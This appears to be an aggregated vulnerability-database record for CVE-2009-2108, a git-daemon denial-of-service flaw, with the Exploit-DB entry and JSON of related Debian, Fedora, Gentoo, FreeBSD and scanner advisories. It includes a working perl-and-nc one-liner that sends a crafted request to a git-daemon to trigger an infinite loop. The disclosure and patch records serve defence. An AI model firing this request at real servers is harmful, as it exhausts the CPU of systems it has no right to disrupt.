Git <= 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability
2009-05-05T00:00:00
ID EDB-ID:33036 Type exploitdb Reporter Shawn O. Pearce Modified 2009-05-05T00:00:00
Description
Git 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability. CVE-2009-2108. Dos exploit for linux platform
source: http://www.securityfocus.com/bid/35338/info
Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests.
Attackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial-of-service condition.
Git 1.4.4.5 through 1.6.3.2 are vulnerable; other versions may also be affected.
$ perl -e '
$s="git-upload-pack git\0user=me\0host=localhost\0";
printf "%4.4x%s",4+length $s,$s
' | nc $GITHOST 9418
{"bulletinFamily": "exploit", "id": "EDB-ID:33036", "cvelist": ["CVE-2009-2108"], "modified": "2009-05-05T00:00:00", "lastseen": "2016-02-03T18:20:33", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/35338/info\r\n\r\n\r\nGit is prone to a denial-of-service vulnerability because it fails to properly handle some client requests.\r\n\r\nAttackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial-of-service condition.\r\n\r\nGit 1.4.4.5 through 1.6.3.2 are vulnerable; other versions may also be affected.\r\n\r\n$ perl -e '\r\n$s=\"git-upload-pack git\\0user=me\\0host=localhost\\0\";\r\nprintf \"%4.4x%s\",4+length $s,$s\r\n' | nc $GITHOST 9418 ", "published": "2009-05-05T00:00:00", "href": "https://www.exploit-db.com/exploits/33036/", "osvdbidlist": ["55034"], "reporter": "Shawn O. Pearce", "hash": "cd994ff93f60199107d9033e49c58381e1e1a2739d045d4f99dcb3a0581689bd", "title": "Git <= 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Git 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability. CVE-2009-2108. Dos exploit for linux platform", "references": [], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33036/", "enchantments": {"vulnersScore": 3.5}}
{"result": {"cve": [{"id": "CVE-2009-2108", "type": "cve", "title": "CVE-2009-2108", "description": "git-daemon in git 1.4.4.5 through 1.6.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a request containing extra unrecognized arguments.", "published": "2009-06-18T14:30:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2108", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-08-17T11:14:22"}], "nessus": [{"id": "DEBIAN_DSA-1841.NASL", "type": "nessus", "title": "Debian DSA-1841-1 : git-core - denial of service", "description": "It was discovered that git-daemon which is part of git-core, a popular distributed revision control system, is vulnerable to denial of service attacks caused by a programming mistake in handling requests containing extra unrecognized arguments which results in an infinite loop. While this is no problem for the daemon itself as every request will spawn a new git-daemon instance, this still results in a very high CPU consumption and might lead to denial of service conditions.", "published": "2010-02-24T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=44706", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:45:32"}, {"id": "FEDORA_2009-6839.NASL", "type": "nessus", "title": "Fedora 10 : git-1.6.0.6-4.fc10 (2009-6839)", "description": "This update fixes a Denial of Service vulnerability in git-daemon. It also fixes minor issues when using git-cvsimport and the formatting of the git-daemon xinetd service description.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-06-25T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39509", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:33:46"}, {"id": "FEDORA_2009-6809.NASL", "type": "nessus", "title": "Fedora 9 : git-1.6.0.6-4.fc9 (2009-6809)", "description": "This update fixes a Denial of Service vulnerability in git-daemon. It also fixes minor issues when using git-cvsimport and the formatting of the git-daemon xinetd service description.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-06-25T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39507", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:38:11"}, {"id": "GENTOO_GLSA-200907-05.NASL", "type": "nessus", "title": "GLSA-200907-05 : git: git-daemon Denial of Service", "description": "The remote host is affected by the vulnerability described in GLSA-200907-05 (git: git-daemon Denial of Service)\n\n Shawn O. Pearce reported that git-daemon runs into an infinite loop when handling requests that contain unrecognized arguments.\n Impact :\n\n A remote unauthenticated attacker could send a specially crafted request to git-daemon, possibly leading to a Denial of Service (CPU consumption).\n Workaround :\n\n There is no known workaround at this time.", "published": "2009-07-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39776", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:43:25"}, {"id": "FEDORA_2009-6936.NASL", "type": "nessus", "title": "Fedora 11 : git-1.6.2.5-1.fc11 (2009-6936)", "description": "This update fixes a Denial of Service vulnerability in git-daemon.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-06-25T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39513", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:38:20"}, {"id": "FREEBSD_PKG_D9B01C0859B311DE828E00E0815B8DA8.NASL", "type": "nessus", "title": "FreeBSD : git -- denial of service vulnerability (d9b01c08-59b3-11de-828e-00e0815b8da8)", "description": "SecurityFocus reports :\n\nGit is prone to a denial-of-service vulnerability because it fails to properly handle some client requests.\n\nAttackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial of service condition.", "published": "2009-06-16T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39408", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:44:24"}, {"id": "MANDRIVA_MDVSA-2009-155.NASL", "type": "nessus", "title": "Mandriva Linux Security Advisory : git (MDVSA-2009:155)", "description": "A vulnerability has been found and corrected in git :\n\ngit-daemon in git 1.4.4.5 through 1.6.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a request containing extra unrecognized arguments (CVE-2009-2108).\n\nThis update provides fixes for this vulnerability.", "published": "2010-07-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=48150", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-10-29T13:39:50"}], "openvas": [{"id": "OPENVAS:64427", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-05 (git)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-05.", "published": "2009-07-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64427", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-07-24T12:57:02"}, {"id": "OPENVAS:136141256231064288", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-6809 (git)", "description": "The remote host is missing an update to git\nannounced via advisory FEDORA-2009-6809.", "published": "2009-06-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064288", "cvelist": ["CVE-2009-2108"], "lastseen": "2018-04-06T11:39:09"}, {"id": "OPENVAS:136141256231064427", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-05 (git)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-05.", "published": "2009-07-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064427", "cvelist": ["CVE-2009-2108"], "lastseen": "2018-04-06T11:40:04"}, {"id": "OPENVAS:136141256231064292", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-6839 (git)", "description": "The remote host is missing an update to git\nannounced via advisory FEDORA-2009-6839.", "published": "2009-06-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064292", "cvelist": ["CVE-2009-2108"], "lastseen": "2018-04-06T11:37:54"}, {"id": "OPENVAS:136141256231064519", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:176 (git)", "description": "The remote host is missing an update to git\nannounced via advisory MDVSA-2009:176.", "published": "2009-08-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064519", "cvelist": ["CVE-2009-2108"], "lastseen": "2018-04-06T11:40:15"}, {"id": "OPENVAS:64480", "type": "openvas", "title": "Debian Security Advisory DSA 1841-1 (git-core)", "description": "The remote host is missing an update to git-core\nannounced via advisory DSA 1841-1.", "published": "2009-07-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64480", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-07-24T12:56:10"}, {"id": "OPENVAS:64288", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-6809 (git)", "description": "The remote host is missing an update to git\nannounced via advisory FEDORA-2009-6809.", "published": "2009-06-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64288", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-07-25T10:56:43"}, {"id": "OPENVAS:64457", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:155 (git)", "description": "The remote host is missing an update to git\nannounced via advisory MDVSA-2009:155.", "published": "2009-07-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64457", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-07-24T12:57:07"}, {"id": "OPENVAS:64519", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:176 (git)", "description": "The remote host is missing an update to git\nannounced via advisory MDVSA-2009:176.", "published": "2009-08-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64519", "cvelist": ["CVE-2009-2108"], "lastseen": "2017-07-24T12:57:06"}, {"id": "OPENVAS:136141256231064480", "type": "openvas", "title": "Debian Security Advisory DSA 1841-1 (git-core)", "description": "The remote host is missing an update to git-core\nannounced via advisory DSA 1841-1.", "published": "2009-07-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064480", "cvelist": ["CVE-2009-2108"], "lastseen": "2018-04-06T11:37:37"}], "debian": [{"id": "DSA-1841", "type": "debian", "title": "git-core -- denial of service", "description": "It was discovered that git-daemon which is part of git-core, a popular distributed revision control system, is vulnerable to denial of service attacks caused by a programming mistake in handling requests containing extra unrecognized arguments which results in an infinite loop. While this is no problem for the daemon itself as every request will spawn a new git-daemon instance, this still results in a very high CPU consumption and might lead to denial of service conditions.\n\nFor the oldstable distribution (etch), this problem has been fixed in version 1.4.4.4-4+etch3.\n\nFor the stable distribution (lenny), this problem has been fixed in version 1.5.6.5-3+lenny2.\n\nFor the testing distribution (squeeze), this problem has been fixed in version 1:1.6.3.3-1.\n\nFor the unstable distribution (sid), this problem has been fixed in version 1:1.6.3.3-1.\n\nWe recommend that you upgrade your git-core packages.", "published": "2009-07-25T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://www.debian.org/security/dsa-1841", "cvelist": ["CVE-2009-2108"], "lastseen": "2016-09-02T18:24:06"}], "freebsd": [{"id": "D9B01C08-59B3-11DE-828E-00E0815B8DA8", "type": "freebsd", "title": "git -- denial of service vulnerability", "description": "\nSecurityFocus reports:\n\nGit is prone to a denial-of-service vulnerability because it\n\t fails to properly handle some client requests.\nAttackers can exploit this issue to cause a daemon process to\n\t enter an infinite loop. Repeated exploits may consume excessive\n\t system resources, resulting in a denial of service condition.\n\n", "published": "2009-06-04T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/d9b01c08-59b3-11de-828e-00e0815b8da8.html", "cvelist": ["CVE-2009-2108"], "lastseen": "2016-09-26T17:24:52"}], "gentoo": [{"id": "GLSA-200907-05", "type": "gentoo", "title": "git: git-daemon Denial of Service", "description": "### Background\n\ngit - the stupid content tracker, the revision control system used by the Linux kernel team. \n\n### Description\n\nShawn O. Pearce reported that git-daemon runs into an infinite loop when handling requests that contain unrecognized arguments. \n\n### Impact\n\nA remote unauthenticated attacker could send a specially crafted request to git-daemon, possibly leading to a Denial of Service (CPU consumption). \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll git users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-util/git-1.6.3.3\"", "published": "2009-07-12T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200907-05", "cvelist": ["CVE-2009-2108"], "lastseen": "2016-09-06T19:46:28"}]}}